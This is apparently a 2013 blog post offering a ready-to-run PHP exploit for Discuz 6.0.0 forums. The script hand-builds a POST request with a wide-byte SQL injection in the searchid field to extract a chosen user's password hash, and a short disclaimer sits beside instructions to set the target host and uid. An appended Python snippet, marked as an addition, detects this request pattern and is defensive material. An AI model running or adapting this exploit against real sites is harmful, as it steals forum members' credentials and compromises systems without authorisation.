Du Gong edition Discuz 6.0.0 exploit script | 71街


22,461 views / 2013.08.18 / 3:03 PM

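For learning and research purposes only; do not use it for illegal purposes.
After changing the domain name and the uid of the user to be cracked, run it and check whether the output contains a password; if it does not, the forum vulnerability has already been fixed.
The code is as follows: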

<?php
// Report all errors except notices.
error_reporting(E_ALL & ~E_NOTICE);
/* Du Gong edition Discuz 6.0.0 exploit script */
/* For learning and research purposes only; do not use it for illegal purposes */
$host = "www.xxx.com"; // forum host name (placeholder)
$path = "forum/";      // forum directory under the web root
$port = 80;
$uid = 1;              // uid of the account to query
// POST body: the searchid parameter carries the injected UNION SELECT.
$content = "action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" . $uid . "/*&do=submit";

// Build the raw HTTP request by hand.
$data = "POST /" . $path . "/index.php" . " HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: wap\r\n";
$data .= "Host: " . $host . "\r\n";
$data .= "Content-length: " . strlen($content) . "\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$data .= $content . "\r\n\r\n";
$ock = fsockopen($host, $port);
if (!$ock) {
	echo 'No response from ' . $host . "\n";
	die;
}
// Send the request and print the raw response.
fwrite($ock, $data);
while (!feof($ock)) {
	echo fgets($ock, 1024);
}
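A defender-side check for the request this script sends, as an added example that is not part of the original post: it parses POST bodies and flags `action=search` requests whose `searchid` is not purely numeric, has a high byte directly before a quote, or contains UNION SELECT. The sample bodies are constructed, the names `inspect_body` and `scan` are hypothetical, and treating a legitimate `searchid` as a plain integer is an assumption the page does not state.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample POST bodies (not captured traffic). The second one is the
# body the script above builds with uid=1.
SAMPLE_BODIES = [
    b"action=search&searchid=22&do=submit",
    b"action=search&searchid=22%cf' UNION SELECT 1,password,3,password"
    b"/**/from/**/cdb_members/**/where/**/uid=1/*&do=submit",
    b"action=search&searchid=abc&do=submit",
    b"action=forum&fid=3",
]

# A byte >= 0x80 directly followed by a quote or backslash, as in "%cf'".
HIGH_BYTE_QUOTE = re.compile(r"[\x80-\xff]['\"\\]")
UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)


def inspect_body(body):
    """Return the reasons a POST body looks like the searchid injection."""
    # latin-1 maps every byte to one code point, so %cf survives decoding
    # as U+00CF instead of raising or being replaced.
    text = body.decode("latin-1")
    # dict() keeps the last value of a repeated key, as PHP's $_POST does.
    fields = dict(parse_qsl(text, keep_blank_values=True, encoding="latin-1"))
    if fields.get("action") != "search" or "searchid" not in fields:
        return []
    value = fields["searchid"]
    reasons = []
    # Assumption: a legitimate searchid is a plain decimal integer.
    if not re.fullmatch(r"[0-9]+", value):
        reasons.append("non-numeric searchid")
    if HIGH_BYTE_QUOTE.search(value):
        reasons.append("high byte before quote")
    if UNION_SELECT.search(value):
        reasons.append("UNION SELECT in searchid")
    return reasons


def scan(bodies):
    """Map the index of each flagged body to its list of reasons."""
    hits = {}
    for i, body in enumerate(bodies):
        reasons = inspect_body(body)
        if reasons:
            hits[i] = reasons
    return hits


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_BODIES).items():
        print(index, ", ".join(reasons))
```
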
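The content of this site is protected by copyright law. Personal blogs that repost it should follow the Creative Commons "Attribution-NonCommercial-ShareAlike" license; commercial websites and unauthorized media may not copy this site's content.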